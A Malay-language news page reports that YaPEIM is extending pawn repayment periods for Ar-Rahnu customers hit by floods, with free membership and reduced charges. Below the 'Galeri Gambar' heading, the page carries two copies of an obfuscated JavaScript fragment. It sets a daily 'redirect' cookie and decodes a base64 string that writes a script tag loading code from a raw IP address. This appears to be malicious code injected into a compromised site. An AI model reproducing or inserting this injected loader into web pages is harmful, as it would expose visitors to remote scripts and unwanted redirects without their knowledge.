YaPEIM » YaPEIM lanjut tempoh bayaran gadaian

Terkini

YaPEIM lanjut tempoh bayaran gadaian

YaPEIM melanjutkan tempoh bayaran gadaian kepada lebih 20,000 pelanggan Ar-Rahnu yang menjadi mangsa banjir.

KOTA BHARU – Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) melanjutkan tempoh bayaran gadaian kepada lebih 20,000 pelanggan Ar Rahnu yang menjadi mangsa banjir hingga 10 bulan berbanding enam bulan sebelum ini.

Presidennya, Dato’ Dr Hj. Abd. Malek Awang Kechil berkata, ia bertujuan meringankan beban mereka.

Beliau berkata, 13 daripada 202 cawangan Ar Rahnu terdapat di negeri terjejas banjir yang melibatkan lebih 20,000 pelanggan.

YaPEIM juga akan memberi keanggotaan percuma kepada mangsa banjir yang ingin membuat gadaian baharu selain upah simpanan percuma selama sebulan.

“Tiada sebarang caj harian dikenakan dalam tempoh sebulan pertama. Bagi gadaian untuk tujuan perniagaan pula, tidak akan dikenakan caj harian selama dua bulan,” katanya.

Sementara itu Abd Malek berkata, bagi penggadai yang berniaga dan ingin membuat transaksi semula akan menikmati nilai gadaian sehingga 200 peratus.

“Kalau sebelum ini nilai gadaian yang diberikan ialah pada tahap 70 peratus, tetapi keistimewaan sehingga tiga kali ganda ini kami sediakan bagi memberi sokongan kepada mereka yang terjejas banjir untuk membangunkan semula perniagaan mereka,” katanya.

Terdapat 104,000 pelanggan yang membuat gadaian untuk tujuan perniagaan melalui skim Ar Rahnu di seluruh negara. – Bernama

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top